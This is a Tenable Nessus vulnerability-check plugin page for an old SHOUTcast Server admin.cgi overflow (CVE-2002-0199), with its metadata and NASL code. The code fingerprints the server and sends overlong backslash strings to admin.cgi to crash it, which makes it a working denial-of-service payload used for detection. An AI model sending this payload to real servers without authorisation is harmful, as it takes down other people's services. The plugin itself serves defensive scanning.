Lucene search
This script is Copyright (C) 2003-2021 Tenable Network Security, Inc.SHOUTCAST_ADMIN_CGI_OVERFLOW.NASLHistoryJun 11, 2003 - 12:00 a.m.
SHOUTcast Server admin.cgi Long Argument Overflow
2003-06-1100:00:00
This script is Copyright (C) 2003-2021 Tenable Network Security, Inc.
www.tenable.com
37
The remote SHOUTcast Server crashes when an overly large number of backslashes is passed as an argument to its ‘admin.cgi’ script. An unauthenticated, remote attacker can leverage this issue to crash the affected service or possibly even execute arbitrary code on the affected host.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# References:
# Date: Mon, 21 Jan 2002 22:04:58 -0800
# From: "Austin Ensminger" <[email protected]>
# Subject: Re: Shoutcast server 1.8.3 win32
# To: [email protected]
#
# Date: 19 Jan 2002 18:16:49 -0000
# From: "Brian Dittmer" <[email protected]>
# To: [email protected]
# Subject: Shoutcast server 1.8.3 win32
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(11719);
script_version("1.31");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_cve_id("CVE-2002-0199");
script_bugtraq_id(3934);
script_name(english:"SHOUTcast Server admin.cgi Long Argument Overflow");
script_summary(english:"Overflows admin.cgi");
script_set_attribute(attribute:"synopsis", value:
"The remote streaming audio server is vulnerable a buffer overflow
attack.");
script_set_attribute(attribute:"description", value:
"The remote SHOUTcast Server crashes when an overly large number of
backslashes is passed as an argument to its 'admin.cgi' script. An
unauthenticated, remote attacker can leverage this issue to crash the
affected service or possibly even execute arbitrary code on the affected
host.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Jan/255");
script_set_attribute(attribute:"solution", value:"Unknown at this time.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2002/01/19");
script_set_attribute(attribute:"plugin_publication_date", value:"2003/06/11");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:nullsoft:shoutcast_server");
script_end_attributes();
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2003-2021 Tenable Network Security, Inc.");
script_family(english:"CGI abuses");
script_dependencie("http_version.nasl");
script_require_ports("Services/www", 8888);
# Shoutcast is often on a high port
exit(0);
}
# The script code starts here
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default: 8888, embedded: 0);
if (http_is_dead(port: port)) exit(1, "The web server on port "+port+" is already dead");
banner = get_http_banner(port:port);
if (! banner) exit(1, "No HTTP banner on port "+port);
if ("shoutcast" >!< tolower(banner) )
exit(0, "The web server on port "+port+" is not Shoutcast");
u = strcat("/admin.cgi?pass=", crap(length:4096, data:"\"));
w = http_send_recv3(method:"GET", item: u, port:port);
u = strcat("/admin.cgi?", crap(length:4096, data:"\"));
w = http_send_recv3(method:"GET", item: u, port:port);
if (http_is_dead(port: port))
{
security_hole(port: port);
exit(0);
}
| Vendor | Product | Version | CPE |
|---|---|---|---|
| nullsoft | shoutcast_server | cpe:/a:nullsoft:shoutcast_server |
Related for SHOUTCAST_ADMIN_CGI_OVERFLOW.NASL